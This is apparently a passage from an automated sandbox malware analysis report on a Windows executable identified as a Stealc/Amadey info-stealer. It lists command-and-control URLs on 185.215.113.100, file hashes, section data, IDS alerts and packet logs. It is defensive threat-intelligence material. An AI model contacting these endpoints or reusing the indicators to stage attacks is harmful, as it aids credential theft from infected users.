http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZ	file.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmp	true	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.phpx	file.exe, 00000000.00000002.2801350861.00000000011F6000.00000004.00000020.00020000.00000000.sdmp	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.6.dr	false	URL Reputation: safe	unknown
http://185.215.113.100/e2b1563c6670f193.phpinit.exe	file.exe, 00000000.00000002.2800489909.000000000035C000.00000040.00000001.01000000.00000003.sdmp	true	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.100GIJ	file.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: safe	unknown
http://185.215.113.100:	file.exe, 00000000.00000002.2801350861.000000000119E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://185.215.113.100s.exe	file.exe, 00000000.00000002.2800489909.0000000000321000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2800489909.000000000035C000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: safe	unknown
http://185.215.113.100/e2b1563c6670f193.php7mH	file.exe, 00000000.00000002.2801350861.00000000011F6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.2821491143.0000000061ED3000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2818939342.000000001D853000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.100/0d60be0de163924d/sqlite3.dllc	file.exe, 00000000.00000002.2801350861.00000000011F6000.00000004.00000020.00020000.00000000.sdmp	true	19%, Virustotal, Browse Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.100	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1502482
Start date and time:	2024-09-01 20:53:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/6@0/1
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.20
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target file.exe, PID 3424 because there are no executed function
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
14:54:25	API Interceptor	140783x Sleep call for process: file.exe modified
14:55:14	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.100	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.100/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_d6eca444034557dbadee3a9b8c12d3885e1caed_6983241a_16bd15ca-eeb6-4121-8ba8-a24a92496132\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9715733055531203
Encrypted:	false
SSDEEP:	192:WhsHhjvnPlD0BU/7E3juCZr+dqWzuiFqZ24IO8ThB:NnNwBU/AjWXzuiFqY4IO8r
MD5:	CD33BF2695AD4D6F68E0A5B710F0121C
SHA1:	2A4D97D8C758C386CE70ACC9753CC044FD29CFA5
SHA-256:	135D04A927E896A01B43D7B4CD4675DAFB00007BEC9001EDBBDB43103EF0CF7B
SHA-512:	A13B8394A507F49829EB1891196BC88FDDB384E1DB732622992D836EFC1BD4383C1A89A355FFF45012FD8F6FD8A9D040FFDAA916E185CDCA18569041618174A4
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.6.9.0.4.9.9.1.6.6.6.1.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.6.9.0.4.9.9.7.1.3.4.9.1.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.6.b.d.1.5.c.a.-.e.e.b.6.-.4.1.2.1.-.8.b.a.8.-.a.2.4.a.9.2.4.9.6.1.3.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.0.7.0.6.2.0.a.-.f.d.9.1.-.4.2.5.6.-.b.d.1.d.-.3.f.9.8.1.7.5.a.b.0.3.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.6.0.-.0.0.0.1.-.0.0.1.4.-.8.0.0.5.-.1.1.4.b.a.0.f.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.4.2.8.b.b.b.6.b.f.1.2.5.8.4.e.d.a.0.e.0.d.9.c.7.b.a.8.4.5.1.e.7.9.2.e.0.8.5.0.7.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.8.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6CDF.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sun Sep 1 18:54:59 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	285582
Entropy (8bit):	1.3620113564109735
Encrypted:	false
SSDEEP:	384:A/gNeEdU8kkcoVPrTX3Cnl9XkxJUYhVVLB:2gNeEdgP6/wpeB
MD5:	FBB1280DBDB1DE3E5BF89987B89DACF4
SHA1:	D505179920528E1385839D84F9B2123515FB2B6D
SHA-256:	9B2E375425228449D9D4F4BA3C2D195E9447E9B47B1C053031822D3DF4CA34A5
SHA-512:	13617F989EA854485A6DB13B4147C56D50B16F30C18252BAAF6D04D91A49774B64C43548C41281066D459CAC69816D31FA964F16BB3759646F7E6716C8168B41
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........f............d...........`...l.......4...2...........T.......8...........T............<...............#...........%..............................................................................eJ......P&......GenuineIntel............T.......`...B..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E47.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8374
Entropy (8bit):	3.6992016403699743
Encrypted:	false
SSDEEP:	192:R6l7wVeJjCI6r6YEIHSU92gmfBtmprP89bCzsf7Wm:R6lXJ56r6YEISU92gmfbrCYfz
MD5:	1EB72782CF2281B1C70BFD2C76E334A3
SHA1:	2FC68CD52E0D06DBE466FD00B80AAFC4F160BBBA
SHA-256:	1032FB87514C28B0F79D90315299EF6DBC81698CC3D51FB0D15BF9FED21D07E3
SHA-512:	D8564377F4B1369D5C68A49EA5A9F312E81AC8632B53A9875866A409B2380C5331651CDAF0C7DEF3833A39AB39B30BDD6D994F47BF46DC4444D1712F5B377440
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.2.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E87.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4594
Entropy (8bit):	4.469461811840022
Encrypted:	false
SSDEEP:	48:cvIwWl8zs8NJg77aI9JWWpW8VYjYm8M4JIgFw+q8jH2uHUd:uIjf8nI7j37VjJUw2uHUd
MD5:	451847B97FF6478F7B3B977B51690534
SHA1:	53CA07AA77BAFF9A61820AD4079F07B44DFB0C00
SHA-256:	3C00F738F50C4C46205660070C60B3E4D602B190F1870BC78184908C70C7740A
SHA-512:	3B526E02BABF31BB63B05A6BE937F33636A3B66F8C5262491AD6900FFD259766FDE39F13BF38DCCDDA7DD2FCC16F0E2D9A0B9A39DCBD47DD2BF6A669ED60FD53
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="481557" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.421341949076065
Encrypted:	false
SSDEEP:	6144:0Svfpi6ceLP/9skLmb0OTKWSPHaJG8nAgeMZMMhA2fX4WABlEnN20uhiTw9:/vloTKW+EZMM6DFy403w9
MD5:	1B2CA34B23C318335104C5747589062C
SHA1:	6F038B24D81A0DE780D8B9517605A78C6C94CF35
SHA-256:	399D131B58BFC87F858EE57031A9FD1929035DB599501CB54F7C608BFEECFBA6
SHA-512:	95F141FED65785D6A4D8B97797B9DA7CB6DC009DF65B331D992083E4F61AC31B67CBECBBB5B152EC2DADCD7A5CC59CDFE22DEA81B4A57BB72E2651BC732B2F45
Malicious:	false
Reputation:	low
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..q..................................................................................................................................................................................................................................................................................................................................................E........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.946015742389872
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'751'552 bytes
MD5:	e327e97714aa25537fde40f3c48efde7
SHA1:	428bbb6bf12584eda0e0d9c7ba8451e792e08507
SHA256:	2d4680a8ec9567082b77baef594ca11f2a509c4bae189a239855e00d357c7a34
SHA512:	786d9fc5f79a180eb94353cacc9e2eacf12c25d41634807abd9fb161dda33112e7847ceef0b6ca6d884886c1065fbf27f3ae6a6161d10329d9c0b4722b23706e
SSDEEP:	49152:5yuGkFQgUAXfRldRSNc67YugyTIbuna1e:IBkFQW5RJu6unaQ
TLSH:	E58533BA1E93CCA5C5ED0573621338D4F9BCB1B5C7F69D194320E9A2B1337902E6E846
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L...M..f...........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xa6c000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66C88B4D [Fri Aug 23 13:14:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F56ACBEEEAAh
sets byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx+ecx], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx+00000080h], dh
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x23f050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x23f1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x23d000	0x13c00	cc35f48825b052cce0bf6aa8fbba089e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x23e000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x23f000	0x1000	0x200	380655991303f284fcb90ef8e49522a1	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x240000	0x296000	0x200	b1992176c4c63f7239c618a27705dd19	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
pxgxvnlp	0x4d6000	0x195000	0x194400	4df14749b91613cc7afd0c654dc9612c	False	0.9949553329854669	data	7.954604201720513	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bshzvtbg	0x66b000	0x1000	0x400	3bc0dfa6a2cd55c4c0817bad7b5fac1e	False	0.794921875	data	6.15438558092018	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x66c000	0x3000	0x2200	71eaf5d08437f8d06b758aefacab3fbf	False	0.0646829044117647	DOS executable (COM)	0.6949661970386583	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-09-01T20:54:06.895741+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49704	80	192.168.2.5	185.215.113.100
2024-09-01T20:54:06.322810+0200	TCP	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	49704	80	192.168.2.5	185.215.113.100
2024-09-01T20:53:59.714165+0200	TCP	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	49704	80	192.168.2.5	185.215.113.100
2024-09-01T20:54:03.639606+0200	TCP	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	80	49704	185.215.113.100	192.168.2.5
2024-09-01T20:54:00.006452+0200	TCP	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	49704	80	192.168.2.5	185.215.113.100
2024-09-01T20:53:59.416144+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	49704	80	192.168.2.5	185.215.113.100
2024-09-01T20:53:59.720314+0200	TCP	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	80	49704	185.215.113.100	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 1, 2024 20:53:58.230026960 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:53:58.234951019 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:53:58.235033989 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:53:58.237189054 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:53:58.243938923 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:53:59.091248035 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:53:59.091322899 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:53:59.094611883 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:53:59.099858046 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:53:59.416059971 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:53:59.416143894 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:53:59.418201923 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:53:59.432555914 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:53:59.713977098 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:53:59.714000940 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:53:59.714164972 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:53:59.714164972 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:53:59.715400934 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:53:59.720314026 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:00.006369114 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:00.006382942 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:00.006452084 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:03.198895931 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:03.198987007 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:03.199033022 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:03.199073076 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:03.398574114 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:03.398598909 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:03.398610115 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:03.398644924 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:03.398668051 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:03.602771997 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:03.602945089 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:03.602991104 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:03.603095055 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:03.634809017 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:03.639605999 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:03.914266109 CEST	80	49704	185.215.113.100	192.168.2.5
Sep 1, 2024 20:54:03.914448023 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:03.993865967 CEST	49704	80	192.168.2.5	185.215.113.100
Sep 1, 2024 20:54:03.993901968 CEST	49704	80	192.168.2.5	185.215.113.100
